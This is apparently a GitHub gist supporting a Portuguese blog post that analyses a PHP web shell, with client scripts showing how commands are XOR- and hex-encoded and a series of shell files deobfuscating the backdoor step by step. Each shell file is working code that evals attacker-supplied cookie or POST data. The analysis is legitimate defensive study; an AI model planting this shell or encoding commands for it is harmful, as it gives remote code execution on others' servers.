Skip to content

Instantly share code, notes, and snippets.

@mdjunior

mdjunior/client-00.php

Last active September 23, 2019 02:10
Show Gist options
  • Save mdjunior/98ef602f57ccb30cb57f26b4df410935 to your computer and use it in GitHub Desktop.
Save mdjunior/98ef602f57ccb30cb57f26b4df410935 to your computer and use it in GitHub Desktop.
Download ZIP
Arquivos utilizados para o post Analisando shells em PHP no Medium
Raw
client-00.php
<?php
// Cria a lista com função e argumento
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
?>
Raw
client-01.php
<?php
// Cria a lista com função e argumento
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Gera string com estrutura de dados
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
?>
Raw
client-02.php
<?php
// Cria a lista com função e argumento
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Gera string com estrutura de dados
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR: usa 1's repetidos
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
?>
Raw
client-03.php
<?php
// Cria a lista com função e argumento
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Gera string com estrutura de dados
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR: usa 1's repetidos
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
// Codifica em hexadecimal
// (
// [1] => 111254495452125d42111c5d5059
// )
$cmd_unpack = unpack("H*", $cmd_xor);
?>
Raw
client-04.php
<?php
// Cria a lista com função e argumento
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Gera string com estrutura de dados
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR: usa 1's repetidos
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
// Codifica em hexadecimal
// (
// [1] => 111254495452125d42111c5d5059
// )
$cmd_unpack = unpack("H*", $cmd_xor);
// 1111111111111111111111111111: 111254495452125d42111c5d5059
$chave = $valor_xor;
$valor = $cmd_unpack[1];
?>
Raw
shell-00.php
<?php
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';$ncpkd = Array();$ncpkd[] = $zsyez[6].$zsyez[19];$ncpkd[] = $zsyez[4];$ncpkd[] = $zsyez[27].$zsyez[14].$zsyez[26].$zsyez[27].$zsyez[34].$zsyez[26].$zsyez[15].$zsyez[2].$zsyez[17].$zsyez[7].$zsyez[8].$zsyez[14].$zsyez[3].$zsyez[17].$zsyez[33].$zsyez[15].$zsyez[7].$zsyez[27].$zsyez[17].$zsyez[21].$zsyez[27].$zsyez[14].$zsyez[8].$zsyez[17].$zsyez[0].$zsyez[0].$zsyez[14].$zsyez[20].$zsyez[26].$zsyez[14].$zsyez[15].$zsyez[34].$zsyez[7].$zsyez[2].$zsyez[18].$zsyez[2];$ncpkd[] = $zsyez[20].$zsyez[12].$zsyez[30].$zsyez[32].$zsyez[10];$ncpkd[] = $zsyez[28].$zsyez[10].$zsyez[1].$zsyez[29].$zsyez[1].$zsyez[2].$zsyez[16].$zsyez[2].$zsyez[21].$zsyez[10];$ncpkd[] = $zsyez[2].$zsyez[25].$zsyez[16].$zsyez[22].$zsyez[12].$zsyez[15].$zsyez[2];$ncpkd[] = $zsyez[28].$zsyez[30].$zsyez[8].$zsyez[28].$zsyez[10].$zsyez[1];$ncpkd[] = $zsyez[21].$zsyez[1].$zsyez[1].$zsyez[21].$zsyez[5].$zsyez[29].$zsyez[23].$zsyez[2].$zsyez[1].$zsyez[9].$zsyez[2];$ncpkd[] = $zsyez[28].$zsyez[10].$zsyez[1].$zsyez[22].$zsyez[2].$zsyez[32];$ncpkd[] = $zsyez[16].$zsyez[21].$zsyez[20].$zsyez[13];foreach ($ncpkd[7]($_COOKIE, $_POST) as $fxzcvcv => $peidoza){function vvuoh($ncpkd, $fxzcvcv, $tjplicn){return $ncpkd[6]($ncpkd[4]($fxzcvcv . $ncpkd[2], ($tjplicn / $ncpkd[8]($fxzcvcv)) + 1), 0, $tjplicn);}function hrxaikq($ncpkd, $jjyrjmu){return @$ncpkd[9]($ncpkd[0], $jjyrjmu);}function vbiavuf($ncpkd, $jjyrjmu){$ptdzumj = $ncpkd[3]($jjyrjmu) % 3;if (!$ptdzumj) {eval($jjyrjmu[1]($jjyrjmu[2]));exit();}}$peidoza = hrxaikq($ncpkd, $peidoza);vbiavuf($ncpkd, $ncpkd[5]($ncpkd[1], $peidoza ^ vvuoh($ncpkd, $fxzcvcv, $ncpkd[8]($peidoza))));}
Raw
shell-01-lista.php
// https://www.tehplayground.com/hlQEmHR1EFjVn75r
<?php
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';
$ncpkd = Array();
$ncpkd[] = $zsyez[6] . $zsyez[19];
$ncpkd[] = $zsyez[4];
$ncpkd[] = $zsyez[27] . $zsyez[14] . $zsyez[26] . $zsyez[27] . $zsyez[34] . $zsyez[26] . $zsyez[15] . $zsyez[2] . $zsyez[17] . $zsyez[7] . $zsyez[8] . $zsyez[14] . $zsyez[3] . $zsyez[17] . $zsyez[33] . $zsyez[15] . $zsyez[7] . $zsyez[27] . $zsyez[17] . $zsyez[21] . $zsyez[27] . $zsyez[14] . $zsyez[8] . $zsyez[17] . $zsyez[0] . $zsyez[0] . $zsyez[14] . $zsyez[20] . $zsyez[26] . $zsyez[14] . $zsyez[15] . $zsyez[34] . $zsyez[7] . $zsyez[2] . $zsyez[18] . $zsyez[2];
$ncpkd[] = $zsyez[20] . $zsyez[12] . $zsyez[30] . $zsyez[32] . $zsyez[10];
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[29] . $zsyez[1] . $zsyez[2] . $zsyez[16] . $zsyez[2] . $zsyez[21] . $zsyez[10];
$ncpkd[] = $zsyez[2] . $zsyez[25] . $zsyez[16] . $zsyez[22] . $zsyez[12] . $zsyez[15] . $zsyez[2];
$ncpkd[] = $zsyez[28] . $zsyez[30] . $zsyez[8] . $zsyez[28] . $zsyez[10] . $zsyez[1];
$ncpkd[] = $zsyez[21] . $zsyez[1] . $zsyez[1] . $zsyez[21] . $zsyez[5] . $zsyez[29] . $zsyez[23] . $zsyez[2] . $zsyez[1] . $zsyez[9] . $zsyez[2];
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[22] . $zsyez[2] . $zsyez[32];
$ncpkd[] = $zsyez[16] . $zsyez[21] . $zsyez[20] . $zsyez[13];
print_r($ncpkd);
?>
Raw
shell-01.php
<?php
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';
$ncpkd = Array();
$ncpkd[] = $zsyez[6] . $zsyez[19];
$ncpkd[] = $zsyez[4];
$ncpkd[] = $zsyez[27] . $zsyez[14] . $zsyez[26] . $zsyez[27] . $zsyez[34] . $zsyez[26] . $zsyez[15] . $zsyez[2] . $zsyez[17] . $zsyez[7] . $zsyez[8] . $zsyez[14] . $zsyez[3] . $zsyez[17] . $zsyez[33] . $zsyez[15] . $zsyez[7] . $zsyez[27] . $zsyez[17] . $zsyez[21] . $zsyez[27] . $zsyez[14] . $zsyez[8] . $zsyez[17] . $zsyez[0] . $zsyez[0] . $zsyez[14] . $zsyez[20] . $zsyez[26] . $zsyez[14] . $zsyez[15] . $zsyez[34] . $zsyez[7] . $zsyez[2] . $zsyez[18] . $zsyez[2];
$ncpkd[] = $zsyez[20] . $zsyez[12] . $zsyez[30] . $zsyez[32] . $zsyez[10];
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[29] . $zsyez[1] . $zsyez[2] . $zsyez[16] . $zsyez[2] . $zsyez[21] . $zsyez[10];
$ncpkd[] = $zsyez[2] . $zsyez[25] . $zsyez[16] . $zsyez[22] . $zsyez[12] . $zsyez[15] . $zsyez[2];
$ncpkd[] = $zsyez[28] . $zsyez[30] . $zsyez[8] . $zsyez[28] . $zsyez[10] . $zsyez[1];
$ncpkd[] = $zsyez[21] . $zsyez[1] . $zsyez[1] . $zsyez[21] . $zsyez[5] . $zsyez[29] . $zsyez[23] . $zsyez[2] . $zsyez[1] . $zsyez[9] . $zsyez[2];
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[22] . $zsyez[2] . $zsyez[32];
$ncpkd[] = $zsyez[16] . $zsyez[21] . $zsyez[20] . $zsyez[13];
foreach ($ncpkd[7]($_COOKIE, $_POST) as $fxzcvcv => $peidoza) {
function vvuoh($ncpkd, $fxzcvcv, $tjplicn) {
return $ncpkd[6]($ncpkd[4]($fxzcvcv . $ncpkd[2], ($tjplicn / $ncpkd[8]($fxzcvcv)) + 1), 0, $tjplicn);
}
function hrxaikq($ncpkd, $jjyrjmu) {
return @$ncpkd[9]($ncpkd[0], $jjyrjmu);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = $ncpkd[3]($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$peidoza = hrxaikq($ncpkd, $peidoza);
vbiavuf($ncpkd, $ncpkd[5]($ncpkd[1], $peidoza ^ vvuoh($ncpkd, $fxzcvcv, $ncpkd[8]($peidoza))));
} ?>
Raw
shell-02.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $fxzcvcv => $peidoza) {
function vvuoh($ncpkd, $fxzcvcv, $tjplicn) {
return substr(str_repeat($fxzcvcv . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($fxzcvcv)) + 1), 0, $tjplicn);
}
function hrxaikq($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$peidoza = hrxaikq($ncpkd, $peidoza);
vbiavuf($ncpkd, explode("#", $peidoza ^ vvuoh($ncpkd, $fxzcvcv, strlen($peidoza))));
} ?>
Raw
shell-03-decode.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
function vvuoh($ncpkd, $chave, $tjplicn) {
return substr(str_repeat($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($chave)) + 1), 0, $tjplicn);
}
function decode_hex($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ vvuoh($ncpkd, $chave, strlen($valor))));
} ?>
Raw
shell-03.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
function vvuoh($ncpkd, $chave, $tjplicn) {
return substr(str_repeat($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($chave)) + 1), 0, $tjplicn);
}
function hrxaikq($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$valor = hrxaikq($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ vvuoh($ncpkd, $chave, strlen($valor))));
} ?>
Raw
shell-04.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
function corta_chave($ncpkd, $chave, $valor_tamanho) {
return substr($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", 0, $valor_tamanho);
}
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ corta_chave($ncpkd, $chave, strlen($valor))));
} ?>
Raw
shell-05.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ $chave));
} ?>
Raw
shell-06.php
<?php
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
function run($ncpkd, $cmd_lista) {
$mod_resultado = count($cmd_lista) % 3;
if (!$mod_resultado) {
eval($cmd_lista[1]($cmd_lista[2]));
exit();
}
}
$valor = decode_hex($ncpkd, $valor);
run($ncpkd, explode("#", $valor ^ $chave));
} ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment